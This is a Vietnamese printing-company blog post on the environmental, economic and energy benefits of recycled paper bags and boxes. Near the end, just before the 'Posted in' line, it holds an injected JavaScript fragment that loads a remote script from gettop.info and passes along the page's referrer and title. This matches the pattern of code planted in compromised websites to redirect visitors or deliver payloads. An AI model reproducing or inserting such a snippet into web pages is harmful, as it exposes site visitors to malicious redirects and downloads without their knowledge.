In ấn - thiết kế

Sử dụng túi giấy tái chế, tối ưu hiệu quả xã hội

Sử dụng túi giấy tái chế, tối ưu hiệu quả xã hội

Sử dụng túi giấy tái chế, tối ưu hiệu quả xã hội

Đánh giá in sản phẩm

Không còn những chiếc túi nilon, bao bì nhựa với nhiều tạp chất hóa học ảnh hưởng đến sức khỏe con người và cả môi trường, hộp giấytúi giấy tái chế được sử dụng nhiều lần sẽ là giải pháp mang lại chất lượng cuộc sống tốt đẹp hơn. Nguyên liệu chính yếu tạo ra túi giấy, hộp giấy là gỗ, do vậy mà chúng có thể dùng để tái chế nhiều lần mà không cần phải sản xuất mới. Hãy cùng điểm qua một số lợi ích to lớn của túi giấy tái chế đem đến sau đây.

Sử dụng túi giấy tái chế giúp bảo vệ môi trường

Nguyên liệu để sản xuất giấy nói riêng và bao bì giấy carton nói riêng chủ yếu lấy từ cây gỗ. Do đó việc tái sử dụng giấy làm giảm tổng lượng gỗ phải chặt hạ để sản xuất bột giấy và giảm toàn bộ nhu cầu về gỗ. Nhưng điều quan trọng hơn là tái chế giấy giữ lại được rừng và giảm áp lực chuyển đổi rừng tự nhiên thành rừng sản xuất, gìn giữ hệ thống sinh thái thiên nhiên. Rừng được xem là lá phổi xanh của sự sống, rừng hấp thụ khí CO2 và tạo ra khí Oxi cân bằng sự trong lành của môi trường không khí. Do vậy, việc tái chế giấy diễn ra giúp ngăn chặn được phần nào đó ảnh hưởng của sự tàn phá rừng gây ra.

Túi giấy đựng thực phẩm

Sử dụng túi giấy tái chế mang lại lợi ích kinh tế

Các sản phẩm được sản xuất từ giấy có thể tái chế đến 6 lần trước khi đưa ra phân hủy vào môi trường mà vẫn đảm bảo chất lượng giấy theo tiêu chuẩn. Túi giấy kraft là mẫu điển hình, từ đó tiết kiệm chi phí hơn rất nhiều so với bắt đầu sử dụng lại bột giấy để tạo thành từng lớp giấy mới rồi nén lại với nhau. Xơ sợi tái chế không chỉ dùng để sản xuất giấy làm bao bì, giấy in báo, giấy tissue mà còn dùng để pha trộn với bột nguyên thủy với một tỉ lệ ngày càng cao trong sản xuất giấy cao cấp hơn. Chi phí sản xuất giấy tái chế ngày một giảm và chất lượng xơ sợi tái chế ngày càng tăng nhờ ứng dụng công nghệ cao trong sản xuất dù thị trường ngày càng yêu cầu giấy có độ bền cao hơn.

Sử dụng túi giấy tái chế góp phần tiết kiệm nguồn năng lượng

Trong sản xuất giấy nguyên thủy (bột hóa), phần lớn năng lượng cần dùng là do đốt dịch đen (các thành phần của gỗ còn lại sau khi xơ sợi được lấy đi). Về bản chất đó là gỗ. Đốt gỗ hay nhiên liệu khác (than đá, dầu mỏ…) để lấy năng lượng cũng tạo ra khí gây ô nhiễm. Tuy nhiên các nhiên liệu khác không thể tái sinh, còn gỗ có thể trồng lại. Lấy vòng đời làm cơ sở để cân nhắc các nguồn nhiên liệu, dù sản xuất giấy tái chế dùng nhiều nhiên liệu hơn sản xuất giấy nguyên thủy, thì sản xuất giấy tái chế tạo ra ít khí nhà kính hơn sản xuất giấy nguyên thuỷ.

Có thể thấy, hầu hết hiện nay các cơ sở kinh doanh đều sử dụng túi gấy, hộp giấy trong việc đóng gói, vận chuyển sản phẩm như: túi giấy đựng quà, hộp giấy đựng đồ, mỹ phẩm,… Chính vì thế, nếu sử dụng lượng giấy tái chế sẽ góp phần rất lớn điều chỉnh được nguồn tài nguyên quý giá của nhân loại.

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; d.getElementsByTagName(‘head’)[0].appendChild(s);

Posted in: Thông tin in ấn

Leave a Comment (0) ↓